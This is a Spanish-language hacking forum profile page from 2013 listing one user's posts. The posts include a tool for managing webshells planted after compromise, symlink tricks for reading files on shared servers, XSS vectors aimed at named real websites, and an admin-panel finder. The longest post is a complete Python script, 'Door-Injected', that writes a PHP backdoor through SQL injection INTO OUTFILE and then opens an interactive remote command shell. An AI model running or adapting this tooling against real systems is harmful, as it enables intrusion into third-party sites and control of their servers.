Me equivoqué feo con el tema del iframe, prometo que para la proxima versión se le va incorporar la opción para realizar una conexión mediante un proxy
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#121
Bugs y Exploits / Re:Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]
Abril 14, 2013, 03:57:38 AM #122
Hacking ShowOff / Re:[Reflected XSS] elcossio.com
Abril 12, 2013, 09:02:41 PM #123
Bugs y Exploits / Shell-Save_1.0 [Administra de manera mas eficiente tus webshells online]
Abril 10, 2013, 02:38:51 PM
La idea de crear la ShellSave surge de la propia necesidad de contener de forma ordenada nuestra lista de backdoors web y evitar agendarlos en archivos de texto lo cuál es poco comodo a la hora de realizar una busqueda.
La ShellSave se encarga de ordenarlos de una manera prolija, trabajando mano a mano con una db y obteniendo datos a travez de la url pasada, tales como: ip, nombre del host y geolocalizacion del mismo.
Incluyendo a travez de un iframe la webshell selecciónada.
Como ven se trata de una herramienta super sencilla pero que a la vez resulta de gran utilidad tras la post explotación de uno o varios objetivos.
El proceso de instalación es simple.
- Crear una base de datos e importar el archivo sql que se encuentra en el directorio bd
- Editar el fichero config.php con los datos correspondientes
- Loguearse dentro de la ShellSave con el password por defecto "test"
- Agendar nuestras webshells.
La tool puede ser descargada desde You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Aprovecho el momento para darle las gracias a Antrax y Hd_Breaker por contribuir con el proyecto y darme una gran mano.
La ShellSave se encarga de ordenarlos de una manera prolija, trabajando mano a mano con una db y obteniendo datos a travez de la url pasada, tales como: ip, nombre del host y geolocalizacion del mismo.
Incluyendo a travez de un iframe la webshell selecciónada.
Como ven se trata de una herramienta super sencilla pero que a la vez resulta de gran utilidad tras la post explotación de uno o varios objetivos.
El proceso de instalación es simple.
- Crear una base de datos e importar el archivo sql que se encuentra en el directorio bd
- Editar el fichero config.php con los datos correspondientes
- Loguearse dentro de la ShellSave con el password por defecto "test"
- Agendar nuestras webshells.
La tool puede ser descargada desde You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Aprovecho el momento para darle las gracias a Antrax y Hd_Breaker por contribuir con el proyecto y darme una gran mano.
#124
Bugs y Exploits / Re:Cross Site Scripting (XSS) y Vectores de Evasion
Abril 04, 2013, 03:13:14 PM
Muy bien explicado, lo unico que el double encoding solo sirve para evadir algunos WAF mal configurados y no ciertas funciones de filtro como htmlentities(), htmlespecialchars(), se que en ningun momento te referiste a ese plano, pero lo explico por si alguno le quedan dudas al leer el post. saludos!
#125
Dudas y pedidos generales / Re:[AYUDA] Con Symlink
Marzo 02, 2013, 04:58:20 PM
El error se debe a que no puede identificar el fichero /etc/named.conf, proba de buscar los paths de las webs en /etc/passwd, en el fichero de configuracion de apache o a travez de algun FPD.
El symlink de manera manual lo realizas con el comando ln
Código: bash
o con cat
Código: bash
Pero te podes encontrar con servers que tengan desabilitado dicho comando, por ende podes hacer uso de ciertos lenguajes como perl, php, etc para realizarlo
Código: php
Código: perl
El symlink de manera manual lo realizas con el comando ln
ln -s /path/ /destino/fichero.txto con cat
cat path > destino/fichero.txtPero te podes encontrar con servers que tengan desabilitado dicho comando, por ende podes hacer uso de ciertos lenguajes como perl, php, etc para realizarlo
<? symlink("path", "destino"); ?>#!/usr/bin/perl -w
symlink "path", "destino"; #126
Dudas y pedidos generales / Re:Como conectarme a una Base de datos
Febrero 23, 2013, 11:08:53 PM
mysql -u 'usuario' -p -h 'host'
#127
Hacking ShowOff / XSS Reflected Zone-h
Febrero 22, 2013, 11:56:54 PM
Al notificar una url con un fichero que contenga contenido javascript, el siguiente es cargado a travez de un iframe en el mirror y produce la ejecucion del alert .
Hd_breaker me dio la idea, el sabe por que jeje
#128
Hacking ShowOff / XSS reflected http://iphoneapplicationlist.com
Febrero 21, 2013, 02:57:18 PM
#129
Cursos, manuales y libros / Re:Cómo descubrir si un intruso ha usado tu ordenador
Febrero 18, 2013, 01:19:32 AM #130
Python / Door-Injected
Febrero 11, 2013, 10:51:18 PM
Les dejo un pequeño script que programe en python, sirve para atuomatizar el proceso de inyeccion de codigo a travez una mysqli cuando contamos con un usuario que posee privilegios de FILE en la db, por el momento solo trabaja con inyecciones UNION, se le puede pasar un fichero como entrada para que dicha herramienta comienze a realizar el proceso en cada path buscando una ruta con permisos de escritura, tendremos que generar nuestro propio payload como asi mismo indicar la columna a utilizar para lograr ingresar el backdoor, con respecto a su uso y funcionalidad pueden mirar el video a continuacion. La tool se encuentra en fase beta, por lo que proximamente se le agregaran mas opciones asi como otras tecnicas de inyeccion.
Código: python
#!/usr/bin/env python
# Door-Injected
# Developed by [Q]3rV[0]
import httplib, sys, os, time, urllib2, urllib, random
banner="""
________ .___ __ __ .___
\______ \ ____ ___________ | | ____ |__| ____ _____/ |_ ____ __| _/
| | \ / _ \ / _ \_ __ \ ______ | |/ \ | |/ __ \_/ ___\ __\/ __ \ / __ |
| ` ( <_> | <_> ) | \/ /_____/ | | | \ | \ ___/\ \___| | \ ___// /_/ |
/_______ /\____/ \____/|__| |___|___| /\__| |\___ >\___ >__| \___ >____ |
\/ \/\______| \/ \/ \/ \/
- Door-Injected V1.0 Beta
- Autor:[Q]3rV[0]
- Mail:a.denegado[0x40]gmail[0x2e]com
- Blog:http://underterminal.nixiweb.com
- Saludos: Underc0de TEAM """
if sys.platform=="linux" or sys.platform=="linux2":
os.system('clear')
else:
os.system('cls')
if len(sys.argv)!=3:
print banner
print "\n[*] Modo de uso: "+sys.argv[0]+" <host> <fichero>"
sys.exit(1)
def connect(host):
return httplib.HTTPConnection(host)
def inyect(host, name):
fichero=open(sys.argv[2], "r")
for ruta in fichero:
ruta=ruta.replace("\n", "")
connect(host).request("GET", "/"+path+"%20"+vector+"%20into%20outfile%20%27"+directorio+ruta+name+"%27--")
def buscar(host, name):
fichero=open(sys.argv[2], "r")
for ruta in fichero:
ruta=ruta.replace("\n", "")
search=connect(host)
search.request("GET", ruta+name)
respuesta=search.getresponse()
if respuesta.status==200:
print "\n[*] Door-Injected in ------> http://"+host+ruta+name
else:
print "\n[X] "+ruta+" ------> Imposible escribir!"
def command(shell):
agent={"User-Agent": "Door-Injected"}
metodo=raw_input("\n[*] Metodo [get/post]:")
parametro=raw_input("\n[*] Ingrese el parametro:")
if metodo=="get":
while 1:
command=raw_input("\n[*] Door@Injected-$ ")
data=urllib.urlencode({parametro: command})
cabeceras=urllib2.Request(shell+"?"+data, headers=agent)
print urllib2.urlopen(cabeceras).read()
elif metodo=="post":
while 1:
command=raw_input("\n[*] Door@Injected-$ ")
cabeceras=urllib2.Request(shell, data, headers=agent)
print urllib2.urlopen(cabeceras).read()
else:
print "[ABORT]"
sys.exit(1)
try:
print banner
target=sys.argv[1]
path=target.replace("http://", "").split('/',1)[1]
host=target.replace("http://", "").split('/')[0]
directorio=raw_input("\n[*] Path Web: ")
vector=raw_input("\n[*] /"+path+" ")
vector=vector.replace(" ", "%20")
name="DoorI"+str(random.randint(1,1000))+".php"
print "\n[*] Inyectando en paths..."
time.sleep(2)
inyect(host, name)
print "\n[*] Comprobando shell dump..."
time.sleep(2)
print "\n+-------------------------------------------------------------------------------------+"
buscar(host, name)
print "\n+-------------------------------------------------------------------------------------+"
opcion=raw_input("\n[*] Desea ejecutar la shell ahora? [y/n]:")
if opcion=="y":
shell=raw_input("\n[*] Ingrese la ruta de la shell:")
command(shell)
elif opcion=="n":
sys.exit(1)
else:
print "[ABORT]"
sys.exit(1)
except(KeyboardInterrupt,SystemExit):
pass
#131
Cursos, manuales y libros / Backtrack 5 cookboock
Febrero 01, 2013, 01:36:17 AM
Buscando, buscando...me cruzo con una descarga free de este excelente libro publicado en diciembre del 2012, hace un año y un poquito mas. A continuacion les muesto el temario para que indaguen el contenido antes de darle click a la descarga...
Chapter 1: Up and Running with BackTrack
Introduction
Installing BackTrack to a hard disk drive
Installing BackTrack to a USB drive with persistent memory
Installing BackTrack on VirtualBox
Installing BackTrack using VMware Tools
Fixing the splash screen
Changing the root password
Starting network services
Setting up the wireless network
Chapter 2: Customizing BackTrack
Introduction
Preparing kernel headers
Installing Broadcom drivers
Installing and configuring ATI video card drivers
Installing and configuring NVIDIA video card drivers
Applying updates and configuring extra security tools
Setting up ProxyChains
Directory encryption
Chapter 3: Information Gathering
Introduction
Service enumeration
Determining the network range
Identifying active machines
Finding open ports
Operating system fingerprinting
Service fingerprinting
Threat assessment with Maltego
Mapping the network
Chapter 4: Vulnerability Identification
Introduction
Installing, configuring, and starting Nessus
Nessus – finding local vulnerabilities
Nessus – finding network vulnerabilities
Nessus – finding Linux-specific vulnerabilities
Nessus – finding Windows-specific vulnerabilities
Installing, configuring, and starting OpenVAS
OpenVAS – finding local vulnerabilities
OpenVAS – finding network vulnerabilities
OpenVAS – finding Linux-specific vulnerabilities
OpenVAS – finding Windows-specific vulnerabilities
Chapter 5: Exploitation
Introduction
Implementing exploits from BackTrack
Installing and configuring Metasploitable
Mastering Armitage – the graphical management tool for Metasploit
Mastering the Metasploit Console (MSFCONSOLE)
Mastering the Metasploit CLI (MSFCLI)
Mastering Meterpreter
Metasploitable MySQL
Metasploitable PostgreSQL
Metasploitable Tomcat
Metasploitable PDF
Implementing the browser_autopwn module
Chapter 6: Privilege Escalation
Introduction
Using impersonation tokens
Local privilege escalation attack
Mastering the Social-Engineer Toolkit (SET)
Collecting victims' data
Cleaning up the tracks
Creating a persistent backdoor
Man-in-the-middle attack (MITM)
Chapter 7: Wireless Network Analysis
Introduction
Cracking a WEP wireless network
Cracking a WPA/WPA2 wireless network
Automating wireless network cracking
Accessing clients using a fake AP
URL traffic manipulation
Port redirection
Sniffing network traffic
Accessing an e-mail by stealing cookies
Chapter 8: Voice over IP (VoIP)
Introduction
Using Svmap
Finding valid extensions
Monitoring, capturing, and eavesdropping on VoIP traffic
Using VoIPong
Mastering UCSniff
Mastering Xplico
Capturing SIP authentication
Mastering VoIP Hopper
Causing a denial of service
Attacking VoIP using Metasploit
Sniffing DECT phones
Chapter 9: Password Cracking
Introduction
Online password attacks
Cracking HTTP passwords
Gaining router access
Password profiling
Cracking a Windows password using John the Ripper
Using dictionary attacks
Using rainbow tables
Using NVIDIA Compute Unified Device Architecture (CUDA)
Using ATI Stream
Physical access attacks
Chapter 10: BackTrack Forensics
Introduction
Intrusion detection and log analysis
Recursive directory encryption/decryption
Scanning for signs of rootkits
Recovering data from a problematic source
Retrieving a Windows password
Resetting a Windows password
Looking at the Windows registry entries
Disfruten!...
Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#132
Hacking ShowOff / Re:XSS Reflected clarin.com (El diario mas polemico de la argentina)
Febrero 01, 2013, 12:16:38 AMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
xD muy bueno [Q]3rV[0].
Yo justo hoy mismo vi una propaganda en la TV y estuve por probar en clarin xD
Saludos
jaja a mi me pasa igual, que cuando veo una propaganda y pasan la web, enseguida me pongo a buscar algun fallo en esa web
#133
Hacking ShowOff / XSS Reflected clarin.com (El diario mas polemico de la argentina)
Febrero 01, 2013, 12:07:04 AM
Url del sitio: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vectores:
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"><script>alert(/XSS/)</script>
- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"><script>alert(/XSS/)</script>&to=01/02/2013
Autor: [Q]3rV[0]
Reportado: SI
#134
Dudas y pedidos generales / Re:Safe mode on byppas
Enero 29, 2013, 08:17:56 PM #135
Python / Re:Admin Panel Finder [By 2Fac3R]
Enero 24, 2013, 08:10:45 PM # -----------------------------#
# Admin Panel Finder By 2Fac! #
# v1.0 2013 #
# #
# UnderC0de #
# -----------------------------#
import os, sys, httplib
if os.name=="posix":
os.system("clear")
else:
os.system("cls")
def h():
print """
# -----------------------------#
# Admin Panel Finder By 2Fac! #
# v1.0 2013 #
# #
# UnderC0de.Org #
# -----------------------------#
"""
h()
def uso():
print "\n Sintaxis : ",sys.argv[0]," <host> <fichero> \n"
def greets():
print """
\t\tGr33tz to:
\nxt3mp, arcangel_nigth, ANTRAX, 11Sep, Kr34t0r, GAMARRA, SkippyCreammy,
\nv1c0_h4ck, w4rning, etc, etc .
\n\t\t\t Underc0de.Org"""
def res(url,path):
con = httplib.HTTPConnection(url)
con.request("GET",path)
return con.getresponse().status
def buscar(url):
print "\n Searching...\n\n"
try:
fichero=open(sys.argv[2], "r")
for path in fichero:
code = res(url,path)
if code ==200:
print "FOUND --> "+url+path
except(KeyboardInterrupt):
uso()
except:
pass
if len(sys.argv) != 3 :
uso()
else:
buscar(sys.argv[1])
greets()Lo edite para pasarle como argumento un fichero con paths y el tema de los problemas de compatibilidad saludos!
#136
Hacking ShowOff / XSS reflected tumblr.com
Enero 21, 2013, 01:41:36 AM
Url : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Vector: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login"><h1 onclick=alert("[q]3rv[0]")>underc0de - team>
Autor:[Q]3rV[0]
Reportado:SI
#139
Diseño UX/UI / [Pedido] Banner Undec0de Wargames
Enero 14, 2013, 04:58:01 PM
El titulo lo dice, presiso un banner para representar a los wargames de underc0de, si alguien se ofrece a hacerlo se le agradece, por medidas y diseño enviarme un mp.
#140
Dudas y pedidos generales / Re:[Ayuda]Saber que numero es mayor de una lista de numeros
Enero 03, 2013, 02:14:30 PM
Por que no te explicas mejor? queres pasarle una lista de numeros en un fichero de texto al programa?...
